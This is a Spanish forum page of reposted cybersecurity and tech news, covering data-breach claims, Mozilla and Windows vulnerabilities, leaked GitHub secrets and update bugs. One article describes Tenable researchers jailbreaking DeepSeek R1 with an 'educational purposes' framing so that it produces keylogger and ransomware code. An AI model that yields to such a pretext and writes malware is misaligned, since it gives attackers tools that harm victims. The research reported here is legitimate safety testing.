Temas - AXCESS

Información del Perfil

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - AXCESS

Páginas1 2 3 ... 68

Noticias Informáticas / Se revelan 7 millones de registros pertenecientes a Digitel Venezuela

Marzo 14, 2025, 12:41:11 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un actor de amenazas presuntamente filtró una enorme base de datos que contiene información confidencial de clientes de Digitel, una empresa de telecomunicaciones. Las afirmaciones se realizaron en una publicación en Breachforums, donde el actor supuestamente compartió detalles sobre la presunta vulneración.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Según la publicación, la base de datos supuestamente contiene alrededor de 7 millones de registros de 2025. Se dice que el conjunto de datos incluye información como nombres de clientes, números de teléfono, direcciones de correo electrónico, números de identificación y estados de cuenta.

La publicación afirma que la base de datos completa está disponible para su descarga, con un tamaño de archivo de aproximadamente 1 GB.

Fuente:
DailyDarkWeb
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / Presunta filtración de datos afecta a la Confederación Empresarial Española

Marzo 14, 2025, 12:39:40 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

En una publicación en Breachforums, un actor de amenazas supuestamente afirmó estar en posesión de datos sensibles de la Confederación de Empresarios de Albacete (FEDA), una asociación empresarial española sin ánimo de lucro fundada en 1977. La supuesta base de datos, que supuestamente contiene 36.166 líneas de información, se ofrece a la venta por 300 dólares.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Según la publicación, los datos expuestos incluyen direcciones de correo electrónico y números de teléfono, en formato CSV.

El vendedor afirma que acepta servicios de depósito en garantía para las transacciones y ha indicado a los posibles compradores que se pongan en contacto a través del foro o de una plataforma de mensajería cifrada.

Fuente:
DailyDarkWeb
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / Direcciones IPv4 públicas como garantía de préstamo y pueden valer millones

Marzo 14, 2025, 12:28:36 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

IPv4. Global ha lanzado un nuevo programa de préstamos que utiliza las direcciones IPv4 del prestatario como garantía. La empresa, que se describe a sí misma como "el mercado de IPv4 más grande, confiable y transparente del mundo", afirma que esta nueva facilidad de préstamo es una oferta única para sus clientes.

Ya hemos informado sobre la escasez de direcciones IPv4, y sin duda parecen ser valiosas hoy en día. The Register informa que el operador de red Cogent ha recaudado previamente 206 millones de dólares en bonos respaldados únicamente por sus activos IPv4.

Uno de los primeros clientes importantes de préstamos de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta fue un operador de centros de datos en la nube, cuyo nombre no se ha revelado. IPv4 Global afirma que el cliente aprovechó sus activos IPv4 para obtener financiación y expandir su negocio con éxito. Ese cliente probablemente controlaba numerosas direcciones IPv4, pero No tienes permitido ver enlaces. Registrate o Entra a tu cuenta insiste en que, "independientemente de su tamaño", trabajará con los clientes para comprar, vender, arrendar y solicitar préstamos con garantía de bloques IPv4.

Su página principal muestra con relativa facilidad que No tienes permitido ver enlaces. Registrate o Entra a tu cuenta tiene un negocio próspero, con más de 66 millones de direcciones negociadas y generando 1400 millones de dólares para sus clientes. Atiende a clientes de todos los tamaños, desde compradores y vendedores de pequeños bloques IPv4 hasta quienes poseen millones de direcciones IPv4.

El comunicado de prensa original y las páginas oficiales no ofrecen mucha información sobre la cantidad de direcciones IPv4 o bloques necesarios (mín./máx.) para optar a un préstamo. Según The Register, una de las consideraciones detrás de los préstamos es el tiempo que tardaría el mercado en absorber la garantía si un prestatario incumpliera sus compromisos: Hilco Global, con sede en Illinois, el holding multinacional de servicios financieros responsable de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, cree que este programa de préstamos se inspirará principalmente en las áreas de experiencia operativa de dicha empresa.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta está cosechando éxitos durante lo que deberían ser los años finales de IPv4. Cabe esperar que las organizaciones estén dispuestas a migrar de IPv4 (direccionamiento de 32 bits) a IPv6 (direccionamiento de 128 bits) para evitar el agotamiento de las direcciones IPv4 y disfrutar del aumento de 4300 millones a aproximadamente 340 undecillones de direcciones disponibles. Pero aunque los costos de IPv4 han aumentado en los últimos años, aquellos que deseen cambiar a IPv6 enfrentan una combinación de inercia administrativa y tecnológica, costos de transición, posibles interrupciones del negocio, problemas de compatibilidad de infraestructura y más.

Fuente:
Tom´s Hardware
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / El chatbot de IA DeepSeek R1 puede manipularse para crear malware

Marzo 14, 2025, 12:26:14 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un nuevo análisis de la firma de ciberseguridad Tenable Research revela que el chatbot de IA de código abierto DeepSeek R1 puede manipularse para generar software malicioso, incluyendo keyloggers y ransomware.

El equipo de investigación de Tenable se propuso evaluar la capacidad de DeepSeek para crear código dañino. Se centraron en dos tipos comunes de malware: keyloggers, que registran secretamente las pulsaciones de teclas, y ransomware, que cifra archivos y exige un pago por su liberación.

Si bien el chatbot de IA no produce malware completamente funcional de fábrica y requiere una guía adecuada y correcciones manuales de código para producir un keylogger completamente funcional, la investigación sugiere que podría reducir las barreras de entrada para los ciberdelincuentes.

Inicialmente, al igual que otros grandes modelos de lenguaje (LLM), DeepSeek cumplió con sus directrices éticas integradas y rechazó las solicitudes directas para desarrollar malware. Sin embargo, los investigadores de Tenable emplearon una técnica de "jailbreak" que engañó a la IA, presentando la solicitud con "fines educativos" para eludir estas restricciones.

Los investigadores aprovecharon una función clave de DeepSeek: su capacidad de "cadena de pensamiento" (CdP). Esta característica permite a la IA explicar su proceso de razonamiento paso a paso, de forma similar a como alguien piensa en voz alta mientras resuelve un problema. Al observar la CdP de DeepSeek, los investigadores obtuvieron información sobre cómo la IA abordaba el desarrollo de malware e incluso reconocieron la necesidad de técnicas de sigilo para evitar la detección.

DeepSeek: Desarrollo de Keylogger

Cuando se le encargó desarrollar un keylogger, DeepSeek primero delineó un plan y luego generó código C++. Este código inicial presentaba fallas y contenía varios errores que la IA no pudo corregir por sí sola. Sin embargo, con algunos ajustes manuales de código por parte de los investigadores, el keylogger funcionó correctamente, registrando las pulsaciones de teclas en un archivo.

Esta captura de pantalla muestra el keylogger creado por DeepSeek ejecutándose en el Administrador de tareas, junto con el archivo de registro generado. (Crédito: Tenable Research)

Para ir un paso más allá, los investigadores solicitaron a DeepSeek que ayudara a mejorar el malware ocultando el archivo de registro y cifrando su contenido, para lo cual lograron proporcionar código, requiriendo también una pequeña corrección humana.

DeepSeek Desarrolla Ransomware

El experimento con ransomware siguió un patrón similar. DeepSeek definió su estrategia para crear malware de cifrado de archivos. Produjo varias muestras de código diseñadas para realizar esta función, pero ninguna de estas versiones iniciales se compilaba sin edición manual.

Sin embargo, tras algunos ajustes por parte del equipo de Tenable, algunas de las muestras de ransomware se pusieron en funcionamiento. Estas muestras funcionales incluían funciones para encontrar y cifrar archivos, un método para garantizar que el malware se ejecute automáticamente al iniciar el sistema e incluso un mensaje emergente que informaba a la víctima sobre el cifrado.

DeepSeek Tuvo Dificultades con Tareas Maliciosas Complejas

Si bien DeepSeek demostró su capacidad para generar los componentes básicos del malware, los hallazgos de Tenable destacan que está lejos de ser una solución fácil de usar para los ciberdelincuentes. Crear malware efectivo aún requiere conocimientos técnicos para guiar a la IA y depurar el código resultante. Por ejemplo, DeepSeek tuvo dificultades con tareas más complejas, como hacer que el proceso del malware fuera invisible para el administrador de tareas del sistema.

Sin embargo, a pesar de estas limitaciones, los investigadores de Tenable creen que el acceso a herramientas como DeepSeek podría acelerar el desarrollo de malware. La IA puede proporcionar una ventaja significativa, ofreciendo fragmentos de código y describiendo los pasos necesarios, lo que podría ser especialmente útil para personas con poca experiencia en programación que buscan participar en ciberdelitos.

"DeepSeek puede crear la estructura básica del malware", explica el informe técnico de Tenable, compartido antes de su publicación el jueves. "Sin embargo, no es capaz de hacerlo sin ingeniería adicional y rápida, así como la edición manual de código para funciones más avanzadas". La IA tuvo dificultades con tareas más complejas, como ocultar completamente la presencia del malware a las herramientas de monitorización del sistema.

Trey Ford, director de seguridad de la información de Bugcrowd, empresa líder en ciberseguridad colaborativa con sede en San Francisco, California, comentó sobre el último desarrollo, enfatizando que la IA puede ayudar tanto a los actores bienhechores como a los maliciosos, pero que los esfuerzos de seguridad deberían centrarse en encarecer los ciberataques mediante el fortalecimiento de los endpoints, en lugar de esperar que las soluciones EDR prevengan todas las amenazas.

"Los delincuentes serán delincuentes y usarán todas las herramientas y técnicas a su alcance. El desarrollo asistido por GenAI permitirá una nueva generación de desarrolladores, tanto para iniciativas altruistas como maliciosas", afirmó Trey.

"A modo de recordatorio, el mercado de EDR se centra explícitamente en la DETECCIÓN y RESPUESTA de endpoints; no está diseñado para interrumpir todos los ataques. En última instancia, debemos hacer todo lo posible para aumentar el coste de estas campañas dificultando la explotación de los endpoints; es fundamental reforzarlos según los estándares CIS 1 o 2", explicó.

Fuente:
HackRead
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / IBM obtiene patente para impresión 4D

Marzo 14, 2025, 12:23:11 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

El gigante tecnológico IBM obtuvo una patente de la Oficina de Patentes y Marcas de EE. UU. para su tecnología de transporte de micropartículas mediante un material inteligente impreso en 4D. Según la patente, estos materiales inteligentes pueden utilizar aleaciones o polímeros con memoria de forma que responden a fuerzas externas como la temperatura, la luz, el magnetismo o las corrientes eléctricas.

Tras ser deformados, los materiales inteligentes recuperan su forma original, lo que permite a los investigadores inducirles movimiento y utilizarlos para transportar partículas diminutas que serían difíciles o imposibles de transportar con los métodos de transporte tradicionales.

El usuario debe establecer inicialmente la ruta de entrega y sus condiciones ambientales, además de anotar el tamaño, la forma, el peso y la composición del objeto a entregar. Una vez completado, el algoritmo de aprendizaje automático aplica el estímulo adecuado para mover el material. Este puede ser calor o luz, lo que provoca que una u otra parte del material 4D responda, generando una acción que resulta en una reacción igual pero opuesta.

(Crédito de la imagen: Oficina de Patentes y Marcas de los Estados Unidos)

Además de seguir la ruta inicial del usuario, el lenguaje de máquina de IBM monitoriza el material inteligente impreso en 4D para detectar cualquier desviación o bloqueo. Soluciona la situación, permitiendo que la operación continúe con mínima intervención humana. Al llegar a su destino, se eliminan todos los estímulos externos, lo que permite que el material inteligente entregue su carga.

Este diseño permite la administración de micropartículas de entre 1 y 100 micras de diámetro. Además, sus diferentes métodos de control le permiten viajar a través de diversos medios, lo que lo hace útil para aplicaciones médicas e industriales. Por ejemplo, médicos y tecnólogos médicos podrían usar esta técnica para administrar fármacos a células específicas a través de la sangre o el tracto gastrointestinal. También podría utilizarse para la fabricación de electrónica en miniatura y quizás introducir un nuevo método de fabricación de semiconductores.

La impresión 4D se basa en la tecnología de impresión 3D, en la que el filamento utilizado para la impresión reacciona a estímulos externos. Los investigadores pueden utilizar esto para generar movimiento, de forma similar a cómo un organismo unicelular se mueve mediante reacciones químicas dentro de su membrana celular.

Fuente:
Tom´s Hardware
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / 23 millones de secretos revelados en GitHub

Marzo 12, 2025, 11:07:46 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Aunque las filtraciones de datos están en aumento, los desarrolladores aún se niegan a ser cautelosos. Ya sea por descuidos en el frenesí de la programación o por pura negligencia, exponer credenciales de texto plano, como claves API, contraseñas y tokens de autenticación, crea importantes riesgos de seguridad.

La empresa de seguridad GitGuardian ha revelado que, a lo largo de 2024, los desarrolladores enviaron código a GitHub con más de 23 millones de nuevos secretos codificados. Codificar significa incrustar directamente información confidencial en el código; expertos en ciberseguridad han señalado esta práctica como insegura.

A pesar de los esfuerzos de GitHub por prevenir filtraciones de secretos en la fase de envío del código, la investigación actual muestra que ha habido un aumento del 25 % en las filtraciones con respecto al año pasado.

¿Qué secretos se filtran con más frecuencia?

Los llamados secretos genéricos son el grupo de secretos de mayor crecimiento que los desarrolladores no protegen, representando un sorprendente 58% de todos los secretos filtrados.

Los secretos filtrados incluyen:

Contraseñas codificadas integradas en el código fuente

Cadenas de conexión a bases de datos

Tokens de autenticación personalizados

Claves de cifrado almacenadas en texto plano

Esto es problemático, ya que los secretos genéricos incluyen contraseñas codificadas y credenciales de bases de datos, que son más difíciles de detectar y remediar debido a la falta de patrones estandarizados. Por ejemplo, estos secretos pueden eludir el análisis de secretos integrado de GitHub.

MongoDB, una base de datos documental de código abierto ampliamente utilizada, sigue siendo una fuente importante de credenciales filtradas este año, representando el 18,8% de los secretos detectados en repositorios públicos, en comparación con solo el 3,9% en los privados.

Los tokens de bots de Telegram representaron el 6,3 % de los secretos encontrados en repositorios públicos, pero fueron prácticamente inexistentes en repositorios privados. Esto coincide con el hecho de que la mayoría de las empresas no integran Telegram en sus flujos de trabajo.

Los 10 secretos más importantes en repositorios privados. Fuente: GitGuardian

Los 10 secretos más comunes en repositorios públicos. Fuente: GitGuardian

Los desarrolladores aún dependen de la privacidad de los repositorios para su protección.

Los investigadores descubrieron que los repositorios privados tienen ocho veces más probabilidades de contener secretos codificados. El 35 % de todos los repositorios privados analizados contenían al menos una credencial de texto plano.

Un repositorio privado en GitHub almacena código y archivos a los que solo pueden acceder personas con acceso autorizado, a diferencia de los repositorios públicos. Casi tres cuartas partes de todos los secretos filtrados en estos repositorios eran genéricos.

"Comparamos nuestros hallazgos del GitHub público con datos anónimos de clientes. Los datos muestran que los desarrolladores tratan los secretos en el código público de forma diferente que en el código privado", afirma el informe.

La tendencia sugiere que las organizaciones podrían estar recurriendo a la "seguridad por oscuridad", asumiendo que, dado que sus repositorios son privados, los secretos que contienen están seguros, afirman los investigadores.

En repositorios privados, el 24 % de todos los secretos genéricos encontrados eran contraseñas genéricas, frente al 9 % de todos los secretos genéricos encontrados en repositorios públicos.

Si bien la privacidad del repositorio crea una falsa sensación de seguridad, los atacantes que acceden a él pueden explotar fácilmente los secretos filtrados para ampliar su alcance y moverse lateralmente por los sistemas sin que nadie los detenga.

Aplicaciones iOS con filtraciones

La filtración de secretos es un problema generalizado que afecta a diversas plataformas y aplicaciones. Un nuevo estudio de Cybernews sobre aplicaciones iOS demuestra que nadie está a salvo de la exposición de secretos.

El equipo de investigación de Cybernews analizó más de 156.000 aplicaciones y reveló más de 815.000 secretos filtrados. Los resultados muestran que la mayoría de las aplicaciones de la App Store de Apple parecen filtrar al menos un secreto, incluyendo secretos de alta sensibilidad como claves de almacenamiento en la nube, diversas API e incluso procesadores de pagos.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / Vulnerabilidades en Mozilla podrían poner en riesgo a gobiernos y empresas

Marzo 12, 2025, 11:04:27 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Se han descubierto múltiples vulnerabilidades en productos de Mozilla, incluyendo los navegadores web Firefox y Firefox ESR, así como los clientes de correo electrónico Thunderbird y Thunderbird ESR.

La vulnerabilidad más peligrosa descubierta podría permitir a los actores de amenazas ejecutar código arbitrario en el dispositivo de un usuario sin que la víctima se dé cuenta de que ha sido comprometida.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Los atacantes pueden infectar un dispositivo mediante la técnica Drive-by Compromise, donde simplemente visitar un sitio web malicioso es suficiente para comprometer el dispositivo. Según los privilegios del usuario, un atacante podría instalar programas, acceder, modificar o eliminar datos, e incluso crear nuevas cuentas con permisos de usuario completos.

Las vulnerabilidades descubiertas son particularmente peligrosas para los administradores de sistemas, lo que expone a las organizaciones medianas y grandes e instituciones gubernamentales al mayor riesgo de posible explotación. El riesgo para los usuarios domésticos sigue siendo bajo.

Productos de Mozilla afectados:

Versiones de Thunderbird anteriores a ESR 128.8

Versiones de Thunderbird anteriores a 136

Versiones de Firefox ESR anteriores a 128.8

Versiones de Firefox ESR anteriores a 115.2.1

Versiones de Firefox anteriores a 136

Entre las vulnerabilidades más graves, las siguientes podrían permitir a los atacantes bloquear sistemas, robar datos o ejecutar código malicioso:

CVE-2024-43097 podría causar un desbordamiento de memoria en la representación gráfica, lo que podría provocar fallos o exploits.

CVE-2025-1930 y CVE-2025-1931 implican errores de uso después de la liberación (UAF) en AudioIPC y WebTransportChild, que podrían permitir a los atacantes escapar de los entornos aislados del navegador o ejecutar código remoto.

CVE-2025-1932 podría permitir el acceso no autorizado a la memoria a través de una falla de ordenación XSLT, lo que podría causar fallos o fugas de datos. CVE-2025-1933 podría corromper los valores de retorno de WASM i32 en CPU de 64 bits, lo que provocaría una ejecución incorrecta o riesgos de seguridad.

CVE-2025-1937, CVE-2025-1938 y CVE-2025-1943 implican errores de seguridad de memoria en Firefox y Thunderbird que podrían permitir la ejecución remota de código.

CVE-2025-1939 explota las animaciones de las pestañas personalizadas de Android para tapjacking, engañando a los usuarios para que otorguen permisos no deseados.

La explotación de vulnerabilidades consideradas de menor gravedad podría permitir a los atacantes robar datos, engañar a los usuarios o ejecutar código malicioso:

CVE-2025-26696 podría hacer que un correo electrónico cifrado falso parezca real, exponiendo información confidencial.

CVE-2025-26695 podría permitir a los atacantes intercambiar claves OpenPGP, lo que facilita la suplantación de identidad.

CVE-2025-1934 podría bloquear el navegador o ejecutar código dañino.

CVE-2025-1935 podría engañar a los usuarios para que registren controladores de protocolo maliciosos.

CVE-2025-1936 podría ocultar malware dentro de archivos JAR falsificando extensiones de archivo.

CVE-2025-1942 podría filtrar datos de memoria al convertir texto.

CVE-2025-1940 podría interceptar las solicitudes de Android, engañando a los usuarios para que confirmen acciones no deseadas.

CVE-2024-9956 podría permitir el phishing de claves de acceso a través de Bluetooth. La vulnerabilidad CVE-2025-1941 podría eludir la pantalla de bloqueo de Firefox Focus para Android, exponiendo los datos del navegador.

El 4 de marzo, Mozilla publicó un aviso de seguridad que abordaba los problemas. Es muy recomendable actualizar el software de Mozilla. Hasta el momento, no hay informes de que estas vulnerabilidades se estén explotando.

El año pasado, Mozilla parcheó una vulnerabilidad crítica de día cero que afectaba a Firefox y Thunderbird, y que hackers rusos ya habían explotado. Los ciberdelincuentes utilizaron la vulnerabilidad para ejecutar código arbitrario sin la interacción del usuario, simplemente visitando una página web con un exploit.

Fuente:
CyberNews
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / Mozilla advierte que actualicen Firefox antes de que caduque el certificado

Marzo 12, 2025, 10:42:43 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Mozilla advierte a los usuarios de Firefox que actualicen sus navegadores a la última versión para evitar interrupciones y riesgos de seguridad debido a la próxima expiración de uno de los certificados raíz de la compañía.

El certificado de Mozilla expirará este viernes, 14 de marzo de 2025, y se utilizó para firmar contenido, incluyendo complementos para varios proyectos de Mozilla y el propio Firefox.

Los usuarios deben actualizar sus navegadores a Firefox 128 (publicado en julio de 2024) o posterior, y a ESR 115.13 o posterior para los usuarios de la versión de soporte extendido (ESR).

"El 14 de marzo, un certificado raíz (el recurso utilizado para demostrar que un complemento fue aprobado por Mozilla) expirará, lo que significa que los usuarios de Firefox con versiones anteriores a la 128 (o ESR 115) no podrán usar sus complementos", advierte una entrada del blog de Mozilla.

Queremos que los desarrolladores tengan esto en cuenta en caso de que algunos de sus usuarios utilicen versiones anteriores de Firefox que puedan verse afectadas.

Un documento de soporte de Mozilla explica que no actualizar Firefox podría exponer a los usuarios a importantes riesgos de seguridad y problemas prácticos. Según Mozilla, estos incluyen:

Los complementos maliciosos pueden comprometer los datos o la privacidad del usuario al eludir las protecciones de seguridad.
Los certificados no confiables pueden permitir a los usuarios visitar sitios web fraudulentos o inseguros sin previo aviso.
Las alertas de contraseña comprometida pueden dejar de funcionar, lo que impide que los usuarios sean conscientes de posibles filtraciones de cuentas.

Se observa que el problema afecta a Firefox en todas las plataformas, incluyendo Windows, Android, Linux y macOS, excepto iOS, donde existe un sistema independiente de gestión de certificados raíz.

Mozilla afirma que los usuarios que utilizan versiones anteriores de Firefox pueden seguir usando sus navegadores después de la expiración del certificado si aceptan los riesgos de seguridad, pero el rendimiento y la funcionalidad del software podrían verse gravemente afectados.

"Le recomendamos encarecidamente que actualice a la última versión para evitar estos problemas y garantizar que su navegador se mantenga seguro y eficiente", aconseja Mozilla.

Mozilla también ha creado un hilo de soporte para los usuarios que tengan problemas o necesiten ayuda para actualizar sus navegadores Firefox.

Los usuarios de navegadores basados en Firefox, como Tor, LibreWolf y Waterfox, también deben asegurarse de utilizar una versión basada en Firefox 128 o posterior.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Noticias Informáticas / Microsoft parchea vulnerabilidades de día cero del kernel de Windows

Marzo 12, 2025, 10:39:22 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

La empresa eslovaca de ciberseguridad ESET afirma que una vulnerabilidad de día cero, recientemente parcheada, en el subsistema del kernel Win32 de Windows se ha explotado en ataques desde marzo de 2023.

Corregida en las actualizaciones de seguridad de Windows publicadas durante el Martes de Parches de este mes, la falla de seguridad ahora se identifica como CVE-2025-24983 y fue reportada a Microsoft por el investigador de ESET, Filip Jurčacko.

La vulnerabilidad se debe a una vulnerabilidad de uso después de la liberación que permite a atacantes con privilegios bajos obtener privilegios de sistema sin requerir la interacción del usuario. Sin embargo, Redmond calificó estos ataques como de alta complejidad, ya que para explotarlos con éxito, los actores de la amenaza deben superar una condición de carrera.

ESET anunció el martes que un exploit de día cero dirigido a la vulnerabilidad CVE-2025-24983 se detectó por primera vez en marzo de 2023 en sistemas con puertas traseras que utilizaban el malware PipeMagic.

Este exploit afecta únicamente a versiones anteriores de Windows (Windows Server 2012 R2 y Windows 8.1) que Microsoft ya no soporta. Sin embargo, la vulnerabilidad también afecta a versiones más recientes de Windows, incluyendo Windows Server 2016 y Windows 10, aún compatibles, con Windows 10 compilación 1809 y anteriores.

"La vulnerabilidad de uso después de la liberación (UAF) está relacionada con el uso inadecuado de la memoria durante la ejecución del software. Esto puede provocar fallos del software, la ejecución de código malicioso (incluso remota), la escalada de privilegios o la corrupción de datos", declaró ESET a BleepingComputer. "El exploit se implementó a través de la puerta trasera PipeMagic, capaz de exfiltrar datos y permitir el acceso remoto al equipo".

PipeMagic fue descubierto por Kaspersky en 2022 y puede utilizarse para recopilar datos confidenciales, proporcionar a los atacantes acceso remoto completo a los dispositivos infectados y permitirles desplegar cargas útiles maliciosas adicionales para moverse lateralmente a través de las redes de las víctimas.

En 2023, Kaspersky lo vio implementado en ataques de ransomware Nokoyawa que explotaban otra vulnerabilidad de día cero de Windows: una falla de escalada de privilegios en el controlador del sistema de archivos de registro común, identificada como CVE-2023-28252. Agencias federales deben aplicar parches antes del 1 de abril

Durante el Martes de Parches de marzo de 2025, Microsoft también corrigió las siguientes cinco vulnerabilidades de día cero etiquetadas como explotadas activamente:

CVE-2025-24984 - Vulnerabilidad de divulgación de información de Windows NTFS

CVE-2025-24985 - Vulnerabilidad de ejecución remota de código del controlador del sistema de archivos FAT rápido de Windows

CVE-2025-24991 - Vulnerabilidad de divulgación de información de Windows NTFS

CVE-2025-24993 - Vulnerabilidad de ejecución remota de código de Windows NTFS

CVE-2025-26633 - Vulnerabilidad de omisión de la función de seguridad de Microsoft Management Console

Ayer, CISA añadió las seis vulnerabilidades de día cero a su Catálogo de Vulnerabilidades Explotadas Conocidas, ordenando a las agencias de la Rama Ejecutiva Civil Federal (FCEB) que protejan sus sistemas antes del 1 de abril, según lo exige la Directiva Operacional Vinculante. (BOD) 22-01.

«Este tipo de vulnerabilidades son vectores de ataque frecuentes para ciberdelincuentes maliciosos y representan riesgos significativos para las empresas federales», advirtió la agencia de ciberseguridad estadounidense.

Si bien la BOD 22-01 solo aplica a las agencias FCEB, CISA insta encarecidamente a todas las organizaciones a reducir su exposición a ciberataques priorizando la remediación oportuna de las vulnerabilidades del Catálogo como parte de su gestión de vulnerabilidades.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#10

Noticias Informáticas / Las actualizaciones de Windows hacen que impresoras USB impriman texto aleatorio

Marzo 12, 2025, 10:36:27 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Microsoft afirma que algunas impresoras USB empezarán a imprimir texto aleatorio tras instalar las actualizaciones de Windows publicadas desde finales de enero de 2025.

El problema conocido afecta a Windows 10 (versión 22H2) y Windows 11 (versiones 22H2 y 23H2), pero según una actualización del panel de estado de versiones de Windows, la última versión de Windows 11 (versión 24H2) no se ve afectada.

"Tras instalar la actualización de vista previa de Windows de enero de 2025 (KB5050092), publicada el 29 de enero de 2025, o actualizaciones posteriores, es posible que observe problemas con las impresoras de modo dual conectadas por USB que admitan los protocolos de impresión USB e IPP sobre USB", explica Redmond.

"Es posible que la impresora imprima inesperadamente texto y datos aleatorios, incluyendo comandos de red y caracteres inusuales".

En los sistemas afectados, los usuarios suelen ver texto impreso erróneamente que comienza con el encabezado "POST /ipp/print HTTP/1.1", seguido de otros encabezados relacionados con problemas de IPP (Protocolo de Impresión de Internet).

Estos problemas de impresión son más frecuentes al encender o volver a conectar la impresora tras haberla desconectado. Los usuarios afectados observarán que la impresora imprime inesperadamente cuando el administrador de trabajos de impresión le envía mensajes del protocolo IPP y el controlador de impresora está instalado en el dispositivo Windows.

Solucionado mediante la reversión de problemas conocidos

Microsoft ha resuelto estos problemas de impresión mediante la reversión de problemas conocidos (KIR), una función de Windows que ayuda a revertir actualizaciones defectuosas no relacionadas con la seguridad distribuidas a través de Windows Update. La solución también se implementará automáticamente con una futura actualización de Windows.

Para resolver el problema conocido en los dispositivos Windows administrados por empresas afectados, los administradores de TI deben instalar y configurar las siguientes directivas de grupo:

Reversión de problemas conocidos de Windows 11 22H2 KB5050092 250131_150523

Reversión de problemas conocidos de Windows 10 22H2, 21H1, 21H2 y 22H2 KB5050081 250131_082569

Tras la instalación, la directiva de grupo se encuentra en Configuración del equipo > Plantillas administrativas.

Para implementar la reversión de problemas conocidos, debe acceder a la directiva de equipo local o a la directiva de dominio en el controlador de dominio mediante el Editor de directivas de grupo para seleccionar la versión de Windows deseada. A continuación, reinicie los dispositivos afectados para aplicar la configuración de la directiva de grupo.

Los administradores de TI pueden encontrar más información sobre la implementación y configuración de directivas de grupo de KIR en el sitio web de soporte técnico de Microsoft.

A principios de esta semana, Microsoft también levantó una suspensión de compatibilidad que impedía a algunos usuarios de AutoCAD actualizar a Windows 11 24H2 debido a problemas de inicio y bloqueo.

Fuente:
BleepingComputer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#11

Noticias Informáticas / La actualización KB5053606 de Windows 10 corrige las conexiones SSH rotas

Marzo 12, 2025, 10:34:18 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Microsoft ha lanzado la actualización acumulativa KB5053606 para Windows 10 22H2 y Windows 10 21H2, que corrige numerosos errores, incluyendo uno que impedía las conexiones SSH.

La actualización KB5053606 para Windows 10 es obligatoria, ya que contiene las actualizaciones de seguridad del martes de parches de marzo de 2025 de Microsoft, que corrigen seis vulnerabilidades de día cero explotadas activamente.

Los usuarios de Windows pueden instalar esta actualización accediendo a Configuración, haciendo clic en Windows Update y realizando manualmente la búsqueda de actualizaciones.

Sin embargo, como esta actualización es obligatoria, comenzará a instalarse automáticamente en Windows una vez que se busquen actualizaciones. Para que esto sea más fácil, puede programar una hora para que se reinicie el equipo y finalice la instalación.

Tras instalar esta actualización, Windows 10 22H2 se actualizará a la compilación 19045.5608 y Windows 10 21H2 a la compilación 19044.5608.

Los usuarios de Windows 10 también pueden descargar e instalar manualmente la actualización KB5053606 desde el Catálogo de Microsoft Update.

Novedades de Windows 10 KB5053606

La actualización KB5053606 incluye correcciones para numerosos errores de Windows 10, incluyendo uno que impedía el inicio del servicio OpenSSH y las conexiones.

Esta actualización incluye nueve correcciones o cambios, que se enumeran a continuación.

[Horario de verano (DST)] Esta actualización es compatible con los cambios de horario de verano en Paraguay.

[Narrador]

Corregido: No se muestran correctamente los botones de acción rápida de la ventana de candidatos de IME en chino.

Corregido: No se muestra el tipo de control para el elemento de suscripción a sugerencias de IME en chino.

Corregido: No se indica el encabezado del panel de sugerencias del IME en chino.

[Editor de métodos de entrada (IME)]

Corregido: El IME en chino deja de responder al cambiar la familia o el tamaño de fuente.

Corregido: El contraste de color del panel de sugerencias de búsqueda del IME en chino es inferior al esperado.

[Administrador de ventanas del escritorio (dwm.exe}] Solucionado: Dwm.exe deja de responder con frecuencia.

[Recurso de configuración de país y operador] Esta actualización actualiza los perfiles COSA para ciertos operadores móviles.

[Open Secure Shell (OpenSSH) (problema conocido)] Solucionado: El servicio no se inicia, lo que detiene las conexiones SSH. No se registran detalles y debe ejecutar el proceso sshd.exe manualmente.

Microsoft indica que hay dos problemas conocidos, todos ellos introducidos en actualizaciones anteriores.

Después de instalar las actualizaciones de Windows de enero de 2025 y posteriores, es posible que falle si la versión 2411 del Agente de grabación de sesiones (SRA) de Citrix está instalada en el dispositivo.

"Como solución alternativa, detenga el servicio de supervisión de la grabación de sesiones, instale la actualización de seguridad de Microsoft y habilítelo", explica un boletín de soporte de Citrix.

Es posible que los dispositivos con ciertos componentes de Citrix instalados no puedan completar la instalación de la actualización de seguridad de Windows de enero de 2025. Este problema se observó en dispositivos con Agente de grabación de sesiones de Citrix (SRA), versión 2411. La versión 2411 de esta aplicación se lanzó en diciembre de 2024.

Finalmente, el Visor de eventos de Windows puede mostrar incorrectamente un error de evento 7023 sobre SgrmBroker.exe, indicando:

"El servicio System Guard Runtime Monitor Broker finalizó con el siguiente error: %%3489660935".

